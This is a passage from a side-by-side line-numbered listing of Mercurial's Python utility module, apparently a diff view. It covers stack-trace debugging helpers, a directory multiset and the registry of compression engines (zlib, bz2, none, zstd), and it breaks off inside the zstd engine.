3182
3179 def __init__(self):
3183 def __init__(self):
3180 self._hooks = []
3184 self._hooks = []
3181
3185
3182 def add(self, source, hook):
3186 def add(self, source, hook):
3183 self._hooks.append((source, hook))
3187 self._hooks.append((source, hook))
3184
3188
3185 def __call__(self, *args):
3189 def __call__(self, *args):
3186 self._hooks.sort(key=lambda x: x[0])
3190 self._hooks.sort(key=lambda x: x[0])
3187 results = []
3191 results = []
3188 for source, hook in self._hooks:
3192 for source, hook in self._hooks:
3189 results.append(hook(*args))
3193 results.append(hook(*args))
3190 return results
3194 return results
3191
3195
3192 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3196 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3193 '''Yields lines for a nicely formatted stacktrace.
3197 '''Yields lines for a nicely formatted stacktrace.
3194 Skips the 'skip' last entries, then return the last 'depth' entries.
3198 Skips the 'skip' last entries, then return the last 'depth' entries.
3195 Each file+linenumber is formatted according to fileline.
3199 Each file+linenumber is formatted according to fileline.
3196 Each line is formatted according to line.
3200 Each line is formatted according to line.
3197 If line is None, it yields:
3201 If line is None, it yields:
3198 length of longest filepath+line number,
3202 length of longest filepath+line number,
3199 filepath+linenumber,
3203 filepath+linenumber,
3200 function
3204 function
3201
3205
3202 Not be used in production code but very convenient while developing.
3206 Not be used in production code but very convenient while developing.
3203 '''
3207 '''
3204 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3208 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3205 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3209 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3206 ][-depth:]
3210 ][-depth:]
3207 if entries:
3211 if entries:
3208 fnmax = max(len(entry[0]) for entry in entries)
3212 fnmax = max(len(entry[0]) for entry in entries)
3209 for fnln, func in entries:
3213 for fnln, func in entries:
3210 if line is None:
3214 if line is None:
3211 yield (fnmax, fnln, func)
3215 yield (fnmax, fnln, func)
3212 else:
3216 else:
3213 yield line % (fnmax, fnln, func)
3217 yield line % (fnmax, fnln, func)
3214
3218
3215 def debugstacktrace(msg='stacktrace', skip=0,
3219 def debugstacktrace(msg='stacktrace', skip=0,
3216 f=stderr, otherf=stdout, depth=0):
3220 f=stderr, otherf=stdout, depth=0):
3217 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3221 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3218 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3222 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3219 By default it will flush stdout first.
3223 By default it will flush stdout first.
3220 It can be used everywhere and intentionally does not require an ui object.
3224 It can be used everywhere and intentionally does not require an ui object.
3221 Not be used in production code but very convenient while developing.
3225 Not be used in production code but very convenient while developing.
3222 '''
3226 '''
3223 if otherf:
3227 if otherf:
3224 otherf.flush()
3228 otherf.flush()
3225 f.write('%s at:\n' % msg.rstrip())
3229 f.write('%s at:\n' % msg.rstrip())
3226 for line in getstackframes(skip + 1, depth=depth):
3230 for line in getstackframes(skip + 1, depth=depth):
3227 f.write(line)
3231 f.write(line)
3228 f.flush()
3232 f.flush()
3229
3233
3230 class dirs(object):
3234 class dirs(object):
3231 '''a multiset of directory names from a dirstate or manifest'''
3235 '''a multiset of directory names from a dirstate or manifest'''
3232
3236
3233 def __init__(self, map, skip=None):
3237 def __init__(self, map, skip=None):
3234 self._dirs = {}
3238 self._dirs = {}
3235 addpath = self.addpath
3239 addpath = self.addpath
3236 if safehasattr(map, 'iteritems') and skip is not None:
3240 if safehasattr(map, 'iteritems') and skip is not None:
3237 for f, s in map.iteritems():
3241 for f, s in map.iteritems():
3238 if s[0] != skip:
3242 if s[0] != skip:
3239 addpath(f)
3243 addpath(f)
3240 else:
3244 else:
3241 for f in map:
3245 for f in map:
3242 addpath(f)
3246 addpath(f)
3243
3247
3244 def addpath(self, path):
3248 def addpath(self, path):
3245 dirs = self._dirs
3249 dirs = self._dirs
3246 for base in finddirs(path):
3250 for base in finddirs(path):
3247 if base in dirs:
3251 if base in dirs:
3248 dirs[base] += 1
3252 dirs[base] += 1
3249 return
3253 return
3250 dirs[base] = 1
3254 dirs[base] = 1
3251
3255
3252 def delpath(self, path):
3256 def delpath(self, path):
3253 dirs = self._dirs
3257 dirs = self._dirs
3254 for base in finddirs(path):
3258 for base in finddirs(path):
3255 if dirs[base] > 1:
3259 if dirs[base] > 1:
3256 dirs[base] -= 1
3260 dirs[base] -= 1
3257 return
3261 return
3258 del dirs[base]
3262 del dirs[base]
3259
3263
3260 def __iter__(self):
3264 def __iter__(self):
3261 return iter(self._dirs)
3265 return iter(self._dirs)
3262
3266
3263 def __contains__(self, d):
3267 def __contains__(self, d):
3264 return d in self._dirs
3268 return d in self._dirs
3265
3269
3266 if safehasattr(parsers, 'dirs'):
3270 if safehasattr(parsers, 'dirs'):
3267 dirs = parsers.dirs
3271 dirs = parsers.dirs
3268
3272
3269 def finddirs(path):
3273 def finddirs(path):
3270 pos = path.rfind('/')
3274 pos = path.rfind('/')
3271 while pos != -1:
3275 while pos != -1:
3272 yield path[:pos]
3276 yield path[:pos]
3273 pos = path.rfind('/', 0, pos)
3277 pos = path.rfind('/', 0, pos)
3274
3278
3275 # compression code
3279 # compression code
3276
3280
3277 SERVERROLE = 'server'
3281 SERVERROLE = 'server'
3278 CLIENTROLE = 'client'
3282 CLIENTROLE = 'client'
3279
3283
3280 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3284 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3281 (u'name', u'serverpriority',
3285 (u'name', u'serverpriority',
3282 u'clientpriority'))
3286 u'clientpriority'))
3283
3287
3284 class compressormanager(object):
3288 class compressormanager(object):
3285 """Holds registrations of various compression engines.
3289 """Holds registrations of various compression engines.
3286
3290
3287 This class essentially abstracts the differences between compression
3291 This class essentially abstracts the differences between compression
3288 engines to allow new compression formats to be added easily, possibly from
3292 engines to allow new compression formats to be added easily, possibly from
3289 extensions.
3293 extensions.
3290
3294
3291 Compressors are registered against the global instance by calling its
3295 Compressors are registered against the global instance by calling its
3292 ``register()`` method.
3296 ``register()`` method.
3293 """
3297 """
3294 def __init__(self):
3298 def __init__(self):
3295 self._engines = {}
3299 self._engines = {}
3296 # Bundle spec human name to engine name.
3300 # Bundle spec human name to engine name.
3297 self._bundlenames = {}
3301 self._bundlenames = {}
3298 # Internal bundle identifier to engine name.
3302 # Internal bundle identifier to engine name.
3299 self._bundletypes = {}
3303 self._bundletypes = {}
3300 # Revlog header to engine name.
3304 # Revlog header to engine name.
3301 self._revlogheaders = {}
3305 self._revlogheaders = {}
3302 # Wire proto identifier to engine name.
3306 # Wire proto identifier to engine name.
3303 self._wiretypes = {}
3307 self._wiretypes = {}
3304
3308
3305 def __getitem__(self, key):
3309 def __getitem__(self, key):
3306 return self._engines[key]
3310 return self._engines[key]
3307
3311
3308 def __contains__(self, key):
3312 def __contains__(self, key):
3309 return key in self._engines
3313 return key in self._engines
3310
3314
3311 def __iter__(self):
3315 def __iter__(self):
3312 return iter(self._engines.keys())
3316 return iter(self._engines.keys())
3313
3317
3314 def register(self, engine):
3318 def register(self, engine):
3315 """Register a compression engine with the manager.
3319 """Register a compression engine with the manager.
3316
3320
3317 The argument must be a ``compressionengine`` instance.
3321 The argument must be a ``compressionengine`` instance.
3318 """
3322 """
3319 if not isinstance(engine, compressionengine):
3323 if not isinstance(engine, compressionengine):
3320 raise ValueError(_('argument must be a compressionengine'))
3324 raise ValueError(_('argument must be a compressionengine'))
3321
3325
3322 name = engine.name()
3326 name = engine.name()
3323
3327
3324 if name in self._engines:
3328 if name in self._engines:
3325 raise error.Abort(_('compression engine %s already registered') %
3329 raise error.Abort(_('compression engine %s already registered') %
3326 name)
3330 name)
3327
3331
3328 bundleinfo = engine.bundletype()
3332 bundleinfo = engine.bundletype()
3329 if bundleinfo:
3333 if bundleinfo:
3330 bundlename, bundletype = bundleinfo
3334 bundlename, bundletype = bundleinfo
3331
3335
3332 if bundlename in self._bundlenames:
3336 if bundlename in self._bundlenames:
3333 raise error.Abort(_('bundle name %s already registered') %
3337 raise error.Abort(_('bundle name %s already registered') %
3334 bundlename)
3338 bundlename)
3335 if bundletype in self._bundletypes:
3339 if bundletype in self._bundletypes:
3336 raise error.Abort(_('bundle type %s already registered by %s') %
3340 raise error.Abort(_('bundle type %s already registered by %s') %
3337 (bundletype, self._bundletypes[bundletype]))
3341 (bundletype, self._bundletypes[bundletype]))
3338
3342
3339 # No external facing name declared.
3343 # No external facing name declared.
3340 if bundlename:
3344 if bundlename:
3341 self._bundlenames[bundlename] = name
3345 self._bundlenames[bundlename] = name
3342
3346
3343 self._bundletypes[bundletype] = name
3347 self._bundletypes[bundletype] = name
3344
3348
3345 wiresupport = engine.wireprotosupport()
3349 wiresupport = engine.wireprotosupport()
3346 if wiresupport:
3350 if wiresupport:
3347 wiretype = wiresupport.name
3351 wiretype = wiresupport.name
3348 if wiretype in self._wiretypes:
3352 if wiretype in self._wiretypes:
3349 raise error.Abort(_('wire protocol compression %s already '
3353 raise error.Abort(_('wire protocol compression %s already '
3350 'registered by %s') %
3354 'registered by %s') %
3351 (wiretype, self._wiretypes[wiretype]))
3355 (wiretype, self._wiretypes[wiretype]))
3352
3356
3353 self._wiretypes[wiretype] = name
3357 self._wiretypes[wiretype] = name
3354
3358
3355 revlogheader = engine.revlogheader()
3359 revlogheader = engine.revlogheader()
3356 if revlogheader and revlogheader in self._revlogheaders:
3360 if revlogheader and revlogheader in self._revlogheaders:
3357 raise error.Abort(_('revlog header %s already registered by %s') %
3361 raise error.Abort(_('revlog header %s already registered by %s') %
3358 (revlogheader, self._revlogheaders[revlogheader]))
3362 (revlogheader, self._revlogheaders[revlogheader]))
3359
3363
3360 if revlogheader:
3364 if revlogheader:
3361 self._revlogheaders[revlogheader] = name
3365 self._revlogheaders[revlogheader] = name
3362
3366
3363 self._engines[name] = engine
3367 self._engines[name] = engine
3364
3368
3365 @property
3369 @property
3366 def supportedbundlenames(self):
3370 def supportedbundlenames(self):
3367 return set(self._bundlenames.keys())
3371 return set(self._bundlenames.keys())
3368
3372
3369 @property
3373 @property
3370 def supportedbundletypes(self):
3374 def supportedbundletypes(self):
3371 return set(self._bundletypes.keys())
3375 return set(self._bundletypes.keys())
3372
3376
3373 def forbundlename(self, bundlename):
3377 def forbundlename(self, bundlename):
3374 """Obtain a compression engine registered to a bundle name.
3378 """Obtain a compression engine registered to a bundle name.
3375
3379
3376 Will raise KeyError if the bundle type isn't registered.
3380 Will raise KeyError if the bundle type isn't registered.
3377
3381
3378 Will abort if the engine is known but not available.
3382 Will abort if the engine is known but not available.
3379 """
3383 """
3380 engine = self._engines[self._bundlenames[bundlename]]
3384 engine = self._engines[self._bundlenames[bundlename]]
3381 if not engine.available():
3385 if not engine.available():
3382 raise error.Abort(_('compression engine %s could not be loaded') %
3386 raise error.Abort(_('compression engine %s could not be loaded') %
3383 engine.name())
3387 engine.name())
3384 return engine
3388 return engine
3385
3389
3386 def forbundletype(self, bundletype):
3390 def forbundletype(self, bundletype):
3387 """Obtain a compression engine registered to a bundle type.
3391 """Obtain a compression engine registered to a bundle type.
3388
3392
3389 Will raise KeyError if the bundle type isn't registered.
3393 Will raise KeyError if the bundle type isn't registered.
3390
3394
3391 Will abort if the engine is known but not available.
3395 Will abort if the engine is known but not available.
3392 """
3396 """
3393 engine = self._engines[self._bundletypes[bundletype]]
3397 engine = self._engines[self._bundletypes[bundletype]]
3394 if not engine.available():
3398 if not engine.available():
3395 raise error.Abort(_('compression engine %s could not be loaded') %
3399 raise error.Abort(_('compression engine %s could not be loaded') %
3396 engine.name())
3400 engine.name())
3397 return engine
3401 return engine
3398
3402
3399 def supportedwireengines(self, role, onlyavailable=True):
3403 def supportedwireengines(self, role, onlyavailable=True):
3400 """Obtain compression engines that support the wire protocol.
3404 """Obtain compression engines that support the wire protocol.
3401
3405
3402 Returns a list of engines in prioritized order, most desired first.
3406 Returns a list of engines in prioritized order, most desired first.
3403
3407
3404 If ``onlyavailable`` is set, filter out engines that can't be
3408 If ``onlyavailable`` is set, filter out engines that can't be
3405 loaded.
3409 loaded.
3406 """
3410 """
3407 assert role in (SERVERROLE, CLIENTROLE)
3411 assert role in (SERVERROLE, CLIENTROLE)
3408
3412
3409 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3413 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3410
3414
3411 engines = [self._engines[e] for e in self._wiretypes.values()]
3415 engines = [self._engines[e] for e in self._wiretypes.values()]
3412 if onlyavailable:
3416 if onlyavailable:
3413 engines = [e for e in engines if e.available()]
3417 engines = [e for e in engines if e.available()]
3414
3418
3415 def getkey(e):
3419 def getkey(e):
3416 # Sort first by priority, highest first. In case of tie, sort
3420 # Sort first by priority, highest first. In case of tie, sort
3417 # alphabetically. This is arbitrary, but ensures output is
3421 # alphabetically. This is arbitrary, but ensures output is
3418 # stable.
3422 # stable.
3419 w = e.wireprotosupport()
3423 w = e.wireprotosupport()
3420 return -1 * getattr(w, attr), w.name
3424 return -1 * getattr(w, attr), w.name
3421
3425
3422 return list(sorted(engines, key=getkey))
3426 return list(sorted(engines, key=getkey))
3423
3427
3424 def forwiretype(self, wiretype):
3428 def forwiretype(self, wiretype):
3425 engine = self._engines[self._wiretypes[wiretype]]
3429 engine = self._engines[self._wiretypes[wiretype]]
3426 if not engine.available():
3430 if not engine.available():
3427 raise error.Abort(_('compression engine %s could not be loaded') %
3431 raise error.Abort(_('compression engine %s could not be loaded') %
3428 engine.name())
3432 engine.name())
3429 return engine
3433 return engine
3430
3434
3431 def forrevlogheader(self, header):
3435 def forrevlogheader(self, header):
3432 """Obtain a compression engine registered to a revlog header.
3436 """Obtain a compression engine registered to a revlog header.
3433
3437
3434 Will raise KeyError if the revlog header value isn't registered.
3438 Will raise KeyError if the revlog header value isn't registered.
3435 """
3439 """
3436 return self._engines[self._revlogheaders[header]]
3440 return self._engines[self._revlogheaders[header]]
3437
3441
3438 compengines = compressormanager()
3442 compengines = compressormanager()
3439
3443
3440 class compressionengine(object):
3444 class compressionengine(object):
3441 """Base class for compression engines.
3445 """Base class for compression engines.
3442
3446
3443 Compression engines must implement the interface defined by this class.
3447 Compression engines must implement the interface defined by this class.
3444 """
3448 """
3445 def name(self):
3449 def name(self):
3446 """Returns the name of the compression engine.
3450 """Returns the name of the compression engine.
3447
3451
3448 This is the key the engine is registered under.
3452 This is the key the engine is registered under.
3449
3453
3450 This method must be implemented.
3454 This method must be implemented.
3451 """
3455 """
3452 raise NotImplementedError()
3456 raise NotImplementedError()
3453
3457
3454 def available(self):
3458 def available(self):
3455 """Whether the compression engine is available.
3459 """Whether the compression engine is available.
3456
3460
3457 The intent of this method is to allow optional compression engines
3461 The intent of this method is to allow optional compression engines
3458 that may not be available in all installations (such as engines relying
3462 that may not be available in all installations (such as engines relying
3459 on C extensions that may not be present).
3463 on C extensions that may not be present).
3460 """
3464 """
3461 return True
3465 return True
3462
3466
3463 def bundletype(self):
3467 def bundletype(self):
3464 """Describes bundle identifiers for this engine.
3468 """Describes bundle identifiers for this engine.
3465
3469
3466 If this compression engine isn't supported for bundles, returns None.
3470 If this compression engine isn't supported for bundles, returns None.
3467
3471
3468 If this engine can be used for bundles, returns a 2-tuple of strings of
3472 If this engine can be used for bundles, returns a 2-tuple of strings of
3469 the user-facing "bundle spec" compression name and an internal
3473 the user-facing "bundle spec" compression name and an internal
3470 identifier used to denote the compression format within bundles. To
3474 identifier used to denote the compression format within bundles. To
3471 exclude the name from external usage, set the first element to ``None``.
3475 exclude the name from external usage, set the first element to ``None``.
3472
3476
3473 If bundle compression is supported, the class must also implement
3477 If bundle compression is supported, the class must also implement
3474 ``compressstream`` and `decompressorreader``.
3478 ``compressstream`` and `decompressorreader``.
3475
3479
3476 The docstring of this method is used in the help system to tell users
3480 The docstring of this method is used in the help system to tell users
3477 about this engine.
3481 about this engine.
3478 """
3482 """
3479 return None
3483 return None
3480
3484
3481 def wireprotosupport(self):
3485 def wireprotosupport(self):
3482 """Declare support for this compression format on the wire protocol.
3486 """Declare support for this compression format on the wire protocol.
3483
3487
3484 If this compression engine isn't supported for compressing wire
3488 If this compression engine isn't supported for compressing wire
3485 protocol payloads, returns None.
3489 protocol payloads, returns None.
3486
3490
3487 Otherwise, returns ``compenginewireprotosupport`` with the following
3491 Otherwise, returns ``compenginewireprotosupport`` with the following
3488 fields:
3492 fields:
3489
3493
3490 * String format identifier
3494 * String format identifier
3491 * Integer priority for the server
3495 * Integer priority for the server
3492 * Integer priority for the client
3496 * Integer priority for the client
3493
3497
3494 The integer priorities are used to order the advertisement of format
3498 The integer priorities are used to order the advertisement of format
3495 support by server and client. The highest integer is advertised
3499 support by server and client. The highest integer is advertised
3496 first. Integers with non-positive values aren't advertised.
3500 first. Integers with non-positive values aren't advertised.
3497
3501
3498 The priority values are somewhat arbitrary and only used for default
3502 The priority values are somewhat arbitrary and only used for default
3499 ordering. The relative order can be changed via config options.
3503 ordering. The relative order can be changed via config options.
3500
3504
3501 If wire protocol compression is supported, the class must also implement
3505 If wire protocol compression is supported, the class must also implement
3502 ``compressstream`` and ``decompressorreader``.
3506 ``compressstream`` and ``decompressorreader``.
3503 """
3507 """
3504 return None
3508 return None
3505
3509
3506 def revlogheader(self):
3510 def revlogheader(self):
3507 """Header added to revlog chunks that identifies this engine.
3511 """Header added to revlog chunks that identifies this engine.
3508
3512
3509 If this engine can be used to compress revlogs, this method should
3513 If this engine can be used to compress revlogs, this method should
3510 return the bytes used to identify chunks compressed with this engine.
3514 return the bytes used to identify chunks compressed with this engine.
3511 Else, the method should return ``None`` to indicate it does not
3515 Else, the method should return ``None`` to indicate it does not
3512 participate in revlog compression.
3516 participate in revlog compression.
3513 """
3517 """
3514 return None
3518 return None
3515
3519
3516 def compressstream(self, it, opts=None):
3520 def compressstream(self, it, opts=None):
3517 """Compress an iterator of chunks.
3521 """Compress an iterator of chunks.
3518
3522
3519 The method receives an iterator (ideally a generator) of chunks of
3523 The method receives an iterator (ideally a generator) of chunks of
3520 bytes to be compressed. It returns an iterator (ideally a generator)
3524 bytes to be compressed. It returns an iterator (ideally a generator)
3521 of bytes of chunks representing the compressed output.
3525 of bytes of chunks representing the compressed output.
3522
3526
3523 Optionally accepts an argument defining how to perform compression.
3527 Optionally accepts an argument defining how to perform compression.
3524 Each engine treats this argument differently.
3528 Each engine treats this argument differently.
3525 """
3529 """
3526 raise NotImplementedError()
3530 raise NotImplementedError()
3527
3531
3528 def decompressorreader(self, fh):
3532 def decompressorreader(self, fh):
3529 """Perform decompression on a file object.
3533 """Perform decompression on a file object.
3530
3534
3531 Argument is an object with a ``read(size)`` method that returns
3535 Argument is an object with a ``read(size)`` method that returns
3532 compressed data. Return value is an object with a ``read(size)`` that
3536 compressed data. Return value is an object with a ``read(size)`` that
3533 returns uncompressed data.
3537 returns uncompressed data.
3534 """
3538 """
3535 raise NotImplementedError()
3539 raise NotImplementedError()
3536
3540
3537 def revlogcompressor(self, opts=None):
3541 def revlogcompressor(self, opts=None):
3538 """Obtain an object that can be used to compress revlog entries.
3542 """Obtain an object that can be used to compress revlog entries.
3539
3543
3540 The object has a ``compress(data)`` method that compresses binary
3544 The object has a ``compress(data)`` method that compresses binary
3541 data. This method returns compressed binary data or ``None`` if
3545 data. This method returns compressed binary data or ``None`` if
3542 the data could not be compressed (too small, not compressible, etc).
3546 the data could not be compressed (too small, not compressible, etc).
3543 The returned data should have a header uniquely identifying this
3547 The returned data should have a header uniquely identifying this
3544 compression format so decompression can be routed to this engine.
3548 compression format so decompression can be routed to this engine.
3545 This header should be identified by the ``revlogheader()`` return
3549 This header should be identified by the ``revlogheader()`` return
3546 value.
3550 value.
3547
3551
3548 The object has a ``decompress(data)`` method that decompresses
3552 The object has a ``decompress(data)`` method that decompresses
3549 data. The method will only be called if ``data`` begins with
3553 data. The method will only be called if ``data`` begins with
3550 ``revlogheader()``. The method should return the raw, uncompressed
3554 ``revlogheader()``. The method should return the raw, uncompressed
3551 data or raise a ``RevlogError``.
3555 data or raise a ``RevlogError``.
3552
3556
3553 The object is reusable but is not thread safe.
3557 The object is reusable but is not thread safe.
3554 """
3558 """
3555 raise NotImplementedError()
3559 raise NotImplementedError()
3556
3560
3557 class _zlibengine(compressionengine):
3561 class _zlibengine(compressionengine):
3558 def name(self):
3562 def name(self):
3559 return 'zlib'
3563 return 'zlib'
3560
3564
3561 def bundletype(self):
3565 def bundletype(self):
3562 """zlib compression using the DEFLATE algorithm.
3566 """zlib compression using the DEFLATE algorithm.
3563
3567
3564 All Mercurial clients should support this format. The compression
3568 All Mercurial clients should support this format. The compression
3565 algorithm strikes a reasonable balance between compression ratio
3569 algorithm strikes a reasonable balance between compression ratio
3566 and size.
3570 and size.
3567 """
3571 """
3568 return 'gzip', 'GZ'
3572 return 'gzip', 'GZ'
3569
3573
3570 def wireprotosupport(self):
3574 def wireprotosupport(self):
3571 return compewireprotosupport('zlib', 20, 20)
3575 return compewireprotosupport('zlib', 20, 20)
3572
3576
3573 def revlogheader(self):
3577 def revlogheader(self):
3574 return 'x'
3578 return 'x'
3575
3579
3576 def compressstream(self, it, opts=None):
3580 def compressstream(self, it, opts=None):
3577 opts = opts or {}
3581 opts = opts or {}
3578
3582
3579 z = zlib.compressobj(opts.get('level', -1))
3583 z = zlib.compressobj(opts.get('level', -1))
3580 for chunk in it:
3584 for chunk in it:
3581 data = z.compress(chunk)
3585 data = z.compress(chunk)
3582 # Not all calls to compress emit data. It is cheaper to inspect
3586 # Not all calls to compress emit data. It is cheaper to inspect
3583 # here than to feed empty chunks through generator.
3587 # here than to feed empty chunks through generator.
3584 if data:
3588 if data:
3585 yield data
3589 yield data
3586
3590
3587 yield z.flush()
3591 yield z.flush()
3588
3592
3589 def decompressorreader(self, fh):
3593 def decompressorreader(self, fh):
3590 def gen():
3594 def gen():
3591 d = zlib.decompressobj()
3595 d = zlib.decompressobj()
3592 for chunk in filechunkiter(fh):
3596 for chunk in filechunkiter(fh):
3593 while chunk:
3597 while chunk:
3594 # Limit output size to limit memory.
3598 # Limit output size to limit memory.
3595 yield d.decompress(chunk, 2 ** 18)
3599 yield d.decompress(chunk, 2 ** 18)
3596 chunk = d.unconsumed_tail
3600 chunk = d.unconsumed_tail
3597
3601
3598 return chunkbuffer(gen())
3602 return chunkbuffer(gen())
3599
3603
3600 class zlibrevlogcompressor(object):
3604 class zlibrevlogcompressor(object):
3601 def compress(self, data):
3605 def compress(self, data):
3602 insize = len(data)
3606 insize = len(data)
3603 # Caller handles empty input case.
3607 # Caller handles empty input case.
3604 assert insize > 0
3608 assert insize > 0
3605
3609
3606 if insize < 44:
3610 if insize < 44:
3607 return None
3611 return None
3608
3612
3609 elif insize <= 1000000:
3613 elif insize <= 1000000:
3610 compressed = zlib.compress(data)
3614 compressed = zlib.compress(data)
3611 if len(compressed) < insize:
3615 if len(compressed) < insize:
3612 return compressed
3616 return compressed
3613 return None
3617 return None
3614
3618
3615 # zlib makes an internal copy of the input buffer, doubling
3619 # zlib makes an internal copy of the input buffer, doubling
3616 # memory usage for large inputs. So do streaming compression
3620 # memory usage for large inputs. So do streaming compression
3617 # on large inputs.
3621 # on large inputs.
3618 else:
3622 else:
3619 z = zlib.compressobj()
3623 z = zlib.compressobj()
3620 parts = []
3624 parts = []
3621 pos = 0
3625 pos = 0
3622 while pos < insize:
3626 while pos < insize:
3623 pos2 = pos + 2**20
3627 pos2 = pos + 2**20
3624 parts.append(z.compress(data[pos:pos2]))
3628 parts.append(z.compress(data[pos:pos2]))
3625 pos = pos2
3629 pos = pos2
3626 parts.append(z.flush())
3630 parts.append(z.flush())
3627
3631
3628 if sum(map(len, parts)) < insize:
3632 if sum(map(len, parts)) < insize:
3629 return ''.join(parts)
3633 return ''.join(parts)
3630 return None
3634 return None
3631
3635
3632 def decompress(self, data):
3636 def decompress(self, data):
3633 try:
3637 try:
3634 return zlib.decompress(data)
3638 return zlib.decompress(data)
3635 except zlib.error as e:
3639 except zlib.error as e:
3636 raise error.RevlogError(_('revlog decompress error: %s') %
3640 raise error.RevlogError(_('revlog decompress error: %s') %
3637 forcebytestr(e))
3641 forcebytestr(e))
3638
3642
3639 def revlogcompressor(self, opts=None):
3643 def revlogcompressor(self, opts=None):
3640 return self.zlibrevlogcompressor()
3644 return self.zlibrevlogcompressor()
3641
3645
3642 compengines.register(_zlibengine())
3646 compengines.register(_zlibengine())
3643
3647
3644 class _bz2engine(compressionengine):
3648 class _bz2engine(compressionengine):
3645 def name(self):
3649 def name(self):
3646 return 'bz2'
3650 return 'bz2'
3647
3651
3648 def bundletype(self):
3652 def bundletype(self):
3649 """An algorithm that produces smaller bundles than ``gzip``.
3653 """An algorithm that produces smaller bundles than ``gzip``.
3650
3654
3651 All Mercurial clients should support this format.
3655 All Mercurial clients should support this format.
3652
3656
3653 This engine will likely produce smaller bundles than ``gzip`` but
3657 This engine will likely produce smaller bundles than ``gzip`` but
3654 will be significantly slower, both during compression and
3658 will be significantly slower, both during compression and
3655 decompression.
3659 decompression.
3656
3660
3657 If available, the ``zstd`` engine can yield similar or better
3661 If available, the ``zstd`` engine can yield similar or better
3658 compression at much higher speeds.
3662 compression at much higher speeds.
3659 """
3663 """
3660 return 'bzip2', 'BZ'
3664 return 'bzip2', 'BZ'
3661
3665
3662 # We declare a protocol name but don't advertise by default because
3666 # We declare a protocol name but don't advertise by default because
3663 # it is slow.
3667 # it is slow.
3664 def wireprotosupport(self):
3668 def wireprotosupport(self):
3665 return compewireprotosupport('bzip2', 0, 0)
3669 return compewireprotosupport('bzip2', 0, 0)
3666
3670
3667 def compressstream(self, it, opts=None):
3671 def compressstream(self, it, opts=None):
3668 opts = opts or {}
3672 opts = opts or {}
3669 z = bz2.BZ2Compressor(opts.get('level', 9))
3673 z = bz2.BZ2Compressor(opts.get('level', 9))
3670 for chunk in it:
3674 for chunk in it:
3671 data = z.compress(chunk)
3675 data = z.compress(chunk)
3672 if data:
3676 if data:
3673 yield data
3677 yield data
3674
3678
3675 yield z.flush()
3679 yield z.flush()
3676
3680
3677 def decompressorreader(self, fh):
3681 def decompressorreader(self, fh):
3678 def gen():
3682 def gen():
3679 d = bz2.BZ2Decompressor()
3683 d = bz2.BZ2Decompressor()
3680 for chunk in filechunkiter(fh):
3684 for chunk in filechunkiter(fh):
3681 yield d.decompress(chunk)
3685 yield d.decompress(chunk)
3682
3686
3683 return chunkbuffer(gen())
3687 return chunkbuffer(gen())
3684
3688
3685 compengines.register(_bz2engine())
3689 compengines.register(_bz2engine())
3686
3690
3687 class _truncatedbz2engine(compressionengine):
3691 class _truncatedbz2engine(compressionengine):
3688 def name(self):
3692 def name(self):
3689 return 'bz2truncated'
3693 return 'bz2truncated'
3690
3694
3691 def bundletype(self):
3695 def bundletype(self):
3692 return None, '_truncatedBZ'
3696 return None, '_truncatedBZ'
3693
3697
3694 # We don't implement compressstream because it is hackily handled elsewhere.
3698 # We don't implement compressstream because it is hackily handled elsewhere.
3695
3699
3696 def decompressorreader(self, fh):
3700 def decompressorreader(self, fh):
3697 def gen():
3701 def gen():
3698 # The input stream doesn't have the 'BZ' header. So add it back.
3702 # The input stream doesn't have the 'BZ' header. So add it back.
3699 d = bz2.BZ2Decompressor()
3703 d = bz2.BZ2Decompressor()
3700 d.decompress('BZ')
3704 d.decompress('BZ')
3701 for chunk in filechunkiter(fh):
3705 for chunk in filechunkiter(fh):
3702 yield d.decompress(chunk)
3706 yield d.decompress(chunk)
3703
3707
3704 return chunkbuffer(gen())
3708 return chunkbuffer(gen())
3705
3709
3706 compengines.register(_truncatedbz2engine())
3710 compengines.register(_truncatedbz2engine())
3707
3711
3708 class _noopengine(compressionengine):
3712 class _noopengine(compressionengine):
3709 def name(self):
3713 def name(self):
3710 return 'none'
3714 return 'none'
3711
3715
3712 def bundletype(self):
3716 def bundletype(self):
3713 """No compression is performed.
3717 """No compression is performed.
3714
3718
3715 Use this compression engine to explicitly disable compression.
3719 Use this compression engine to explicitly disable compression.
3716 """
3720 """
3717 return 'none', 'UN'
3721 return 'none', 'UN'
3718
3722
3719 # Clients always support uncompressed payloads. Servers don't because
3723 # Clients always support uncompressed payloads. Servers don't because
3720 # unless you are on a fast network, uncompressed payloads can easily
3724 # unless you are on a fast network, uncompressed payloads can easily
3721 # saturate your network pipe.
3725 # saturate your network pipe.
3722 def wireprotosupport(self):
3726 def wireprotosupport(self):
3723 return compewireprotosupport('none', 0, 10)
3727 return compewireprotosupport('none', 0, 10)
3724
3728
3725 # We don't implement revlogheader because it is handled specially
3729 # We don't implement revlogheader because it is handled specially
3726 # in the revlog class.
3730 # in the revlog class.
3727
3731
3728 def compressstream(self, it, opts=None):
3732 def compressstream(self, it, opts=None):
3729 return it
3733 return it
3730
3734
3731 def decompressorreader(self, fh):
3735 def decompressorreader(self, fh):
3732 return fh
3736 return fh
3733
3737
3734 class nooprevlogcompressor(object):
3738 class nooprevlogcompressor(object):
3735 def compress(self, data):
3739 def compress(self, data):
3736 return None
3740 return None
3737
3741
3738 def revlogcompressor(self, opts=None):
3742 def revlogcompressor(self, opts=None):
3739 return self.nooprevlogcompressor()
3743 return self.nooprevlogcompressor()
3740
3744
3741 compengines.register(_noopengine())
3745 compengines.register(_noopengine())
3742
3746
3743 class _zstdengine(compressionengine):
3747 class _zstdengine(compressionengine):
3744 def name(self):
3748 def name(self):
3745 return 'zstd'
3749 return 'zstd'
3746
3750
3747 @propertycache
3751 @propertycache
3748 def _module(self):
3752 def _module(self):
3749 # Not all installs have the zstd module available. So defer importing
